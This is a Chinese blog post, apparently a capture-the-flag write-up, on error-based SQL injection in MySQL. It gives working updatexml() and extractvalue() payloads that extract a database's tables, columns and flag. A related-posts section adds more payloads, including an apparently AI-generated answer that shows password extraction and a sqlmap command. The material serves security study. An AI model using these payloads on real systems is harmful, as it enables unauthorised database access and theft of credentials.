【SQL注入】报错型注入

最新推荐文章于 2024-08-27 10:28:58 发布
最新推荐文章于 2024-08-27 10:28:58 发布
阅读量659 收藏 2
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/noob_3000/article/details/126258511
版权

and 1=1 无回显时,整数型和字符型注入就都无法使用了。若给出了详细的报错信息,可能就存在报错型注入

先做

updatexml报错

1 union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)

在这里插入图片描述0x7e”:ascii码的"~“,updatexml不能识别的字符 痛,太痛了
我们只要他回显出databases()就行。这里得到数据库名为"sqli

1 union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

在这里插入图片描述照葫芦画瓢,继续利用联合查询爆table_name,得到表名为"flag"和"news"

1 union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1)

在这里插入图片描述
爆列名,得到列名"flag"

1 union select 1,updatexml(1,concat(0x7e,(select flag from sqli.flag),0x7e),1)

在这里插入图片描述发现个问题,flag太长了没有显示完全

1 union select 1,updatexml(1,concat(0x7e,right((select flag from sqli.flag),31),0x7e),1)

在这里插入图片描述
利用right()去显示右边的31位字符,拼接得到flag

extractvalue报错

1 union select extractvalue(1,concat(0x7e,(select database()),0x7e))

在这里插入图片描述
0x7e”:ascii码的"~“,extractvalue不能识别的字符 还是痛
爆database(),得到数据库名"sqli

1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))

在这里插入图片描述爆表明,得到"flag"和"news"

1 union select 1,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e))

在这里插入图片描述
爆列名,得到"flag"
获取flag

1 union select 1,extractvalue(1,concat(0x7e,left((select flag from sqli.flag),31),0x7e))

在这里插入图片描述

1 union select 1,extractvalue(1,concat(0x7e,right((select flag from sqli.flag),31),0x7e))

在这里插入图片描述

再想

报错型注入与前两种注入不同的是,整数型、字符型注入是查询成功后的联合注入;而报错型注入则是查询失败后利用详尽的报错信息对报错回显进行注入。
简而言之,前者注入查询回显,后者注入报错回显

报错型注入的核心就是“利用报错
首先,updatexml()extractvalue()两种方法的原理都是一样的:

XPath_string的格式限制

上例中的"0x7e"(即"~")就是一个不符合XPath_string格式的字符

再来分别看updatexml()和extractvalue():

UPDATEXML (XML_document, XPath_string, new_value);
找到XML_document文档中的XPath_string字符串,并将其替换为new_value字符串

EXTRACTVALUE (XML_document, XPath_string);
在XML_document文档中查询XPath_string并返回

其中XPath_string格式要求为XPath格式的字符串,若不符合格式要求,则会报错并带出查询的结果

针对于两个函数中的XPath_string构造,也就是报错型的利用点进行分析:
concat(0x7e,(select database()),0x7e)
concat()将内容整合成一个字符串“~ (select database()) ~
遇到~非XPath_string格式,报错,而报错的回显会执行select database(),达到注入目的。
之后的注入方法与整数型、字符型注入一样。

noob_3000
关注
报错SQL注入
SheXinK’s Blog
12-17 461
报错SQL注入1SQL注入介绍2、 POST注入PHP代码3、 POST注入测试4、 SQL注入防御 1SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 POST注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
SQL注入:报错注入
qq_68163788的博客
01-27 3221
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入——报错型注入
qq_41554179的博客
03-12 621
报错型sql注入 报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。 语句: - AND(SELECT 1 FROM (SELECT COUNT(*...
报错型SQL注入
heibaikong6的博客
09-08 478
简介 报错型SQL注入SQL注入案例注入的前三步是一致的,但是没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示SQL语句。下面是利用count(*),floor(rand(0)*2),group by 报错。 方法 将两种函数结合应发一些错误,但其中加杂对所需要信息的查询 步骤 依旧进行试验...
SQL注入报错型注入
qq_43348375的博客
04-01 558
sql注入之报错注入
web安全入门之SQL注入-报错型注入
weixin_43726831的博客
09-12 1233
SQL注入报错型注入1.报错型注入分析 报错型注入法适用于无回显数据的场景,适合于没有显示位的web页面,但是有mysql报错输出的场景。metasploitable2-Linux在Less-5和Less-6中就用到了报错型注入方法 这种页面有明显的三种场景 场景1:正确查询成功场景为结果显示。 场景2:正确查询失败场景为空,不显示。 场景3:错误语句查询场景,显示报错语句。 在这种情况下...
sql注入之报错注入
m0_63436163的博客
08-27 1394
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL注入—报错注入
Forget_liu的博客
06-10 1837
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
SQL注入报错注入
qq_45557130的博客
10-07 648
sql注入报错注入
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 1064
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
SQL报错型注入
weixin_44029504的博客
04-16 396
报错型SQL注入 -------------------------------------------------我是小小分隔符---------------------------------------------- 基本原理: 报错型sql注入SQL联合注入的前三步是一致的(上篇博客),但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则...
sql注入(报错注入
2302_79119987的博客
04-19 2197
实行注入的地方。
SQL注入2(报错型注入
嚴 帅的博客
04-25 851
SQL注入(一)https://blog.youkuaiyun.com/weixin_43997530/article/details/105627979 报错型SQL注入 我们先介绍一下报错型SQL注入报错型sql注入sql注入(一)的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示...
sql 报错注入
travelnight的博客
03-15 4264
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
Sql注入-报错注入
WolvenSec的博客
06-06 1988
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL注入之报错注入
soldier_wing的博客
06-30 1274
报错注入通过floor报错注入 固定语句公式 union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b 例子假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from arti
SQL注入报错函数
最新发布
04-22
<think>好的,我现在需要帮助用户查找关于SQL注入中报错函数的使用方法和示例。用户已经提供了一些引用内容,我需要结合这些引用来组织回答。 首先,用户提到了四个引用,其中引用1到4都涉及报错注入的不同方面。引用1解释了报错注入的基本原理,引用2和3提到了使用count()和floor()函数的例子,引用4讨论了updatexml和extractvalue函数的使用。用户的上一次问题涉及时间盲注,现在转向报错注入,可能是在学习不同类型的注入方法。 我需要确保回答结构清晰,分点说明每个报错函数的使用方法,并给出示例。同时,用户需要中文回答,所以要注意用词准确。根据用户提供的引用,报错函数包括floor()+rand()、updatexml、extractvalue等,可能还需要补充其他常见函数如exp()。 接下来,我需要检查每个函数的原理、语法、示例payload,以及注意事项。比如,floor(rand()*2)在group by时导致主键冲突,从而引发报错,这个在引用2和3中提到过。updatexml和extractvalue则是利用XPath语法错误来触发报错,这在引用4中有说明。 还要考虑不同数据库的兼容性,比如MySQLSQL Server是否有不同的函数。用户提供的示例主要是MySQL,所以重点放在MySQL上。此外,需要提到防御措施,帮助用户了解如何防范这类攻击,比如参数化查询和错误信息处理。 用户可能还想知道如何自动化利用这些函数,比如使用sqlmap工具,但问题主要集中在手动使用方法上。因此,示例需要具体,比如如何获取数据库名、表名、字段名,每一步的payload如何构造。 最后,确保回答中的引用标记正确,例如引用[^1]、[^2]等,但根据用户提供的引用内容,可能需要调整引用编号,但用户示例中的引用是[^1]、[^2]、[^3]、[^4],所以保持原样。 总结回答结构: 1. 报错注入原理 2. 常用函数及示例(floor+rand、updatexml、extractvalue、exp) 3. 防御措施 4. 相关问题 需要确保每个函数都有详细的payload示例和解释,并注明对应的引用来源。同时,检查是否有遗漏的函数或方法,如geometrycollection等,但可能用户提供的引用中没有提到,可以暂时不提,或者简要提及。 现在开始组织内容,确保每个部分清晰,使用代码块和表格来展示示例,保持格式正确。</think>#### SQL注入报错函数使用方法详解 --- ### 一、报错注入核心原理 通过构造**特定SQL语句触发数据库报错**,将查询结果直接嵌入错误信息中返回[^1]。核心条件: 1. 应用程序未过滤错误信息(如开启`mysql_error()`输出) 2. 攻击者可控制输入参数 --- ### 二、常用报错函数及Payload示例 #### 1. `floor(rand()*2)` + `GROUP BY`(主键冲突) - **原理**:利用`GROUP BY`分组时产生的临时表主键冲突报错 - **典型Payload**: ```sql id=1' AND (SELECT COUNT(*), CONCAT((SELECT DATABASE()), 0x7e, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x)-- ``` - 输出示例:`Duplicate entry 'database_name~1' for key 'group_key'`[^2] - **应用场景**: - 获取数据库名、表名、字段名 - 逐字符提取数据(配合`SUBSTRING`函数) #### 2. `updatexml()`(XPath语法错误) - **函数语法**: ```sql UPDATEXML(XML_document, XPath_string, new_value) ``` - **Payload构造**: ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT USER()), 0x7e), 1)-- ``` - 输出示例:`XPATH syntax error: '~root@localhost~'`[^4] - **限制**: - 单次最大输出长度32字符(需配合`SUBSTRING`分段获取) - 仅适用于MySQL 5.1.5+版本 #### 3. `extractvalue()`(XPath语法错误) - **函数语法**: ```sql EXTRACTVALUE(XML_document, XPath_string) ``` - **Payload示例**: ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))-- ``` - 输出示例:`XPATH syntax error: '~5.7.36-log~'`[^4] #### 4. `exp()`(数值溢出报错) - **原理**:通过指数函数触发数值溢出错误 - **Payload示例**: ```sql id=1' AND EXP(~(SELECT * FROM (SELECT USER())a))-- ``` - 输出示例:`DOUBLE value is out of range` --- ### 三、分阶段数据提取示例 #### 1. 获取数据库名 ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT DATABASE()), 0x7e), 1)-- ``` #### 2. 提取表名 ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- ``` #### 3. 读取字段值 ```sql id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT password FROM users LIMIT 0,1), FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)-- ``` --- ### 四、防御措施 1. **禁用错误回显**:生产环境关闭`mysql_error()`输出[^4] 2. **参数化查询**: ```python cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) ``` 3. **函数黑名单**:过滤`updatexml`、`extractvalue`等关键词 4. **权限控制**:数据库账户仅授予最小必要权限 --- ### 五、工具辅助 使用`sqlmap`自动化注入(指定报错技术): ```bash sqlmap -u "http://example.com?id=1" --technique=E ``` 参数说明:`--technique=E` 表示使用报错注入技术 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值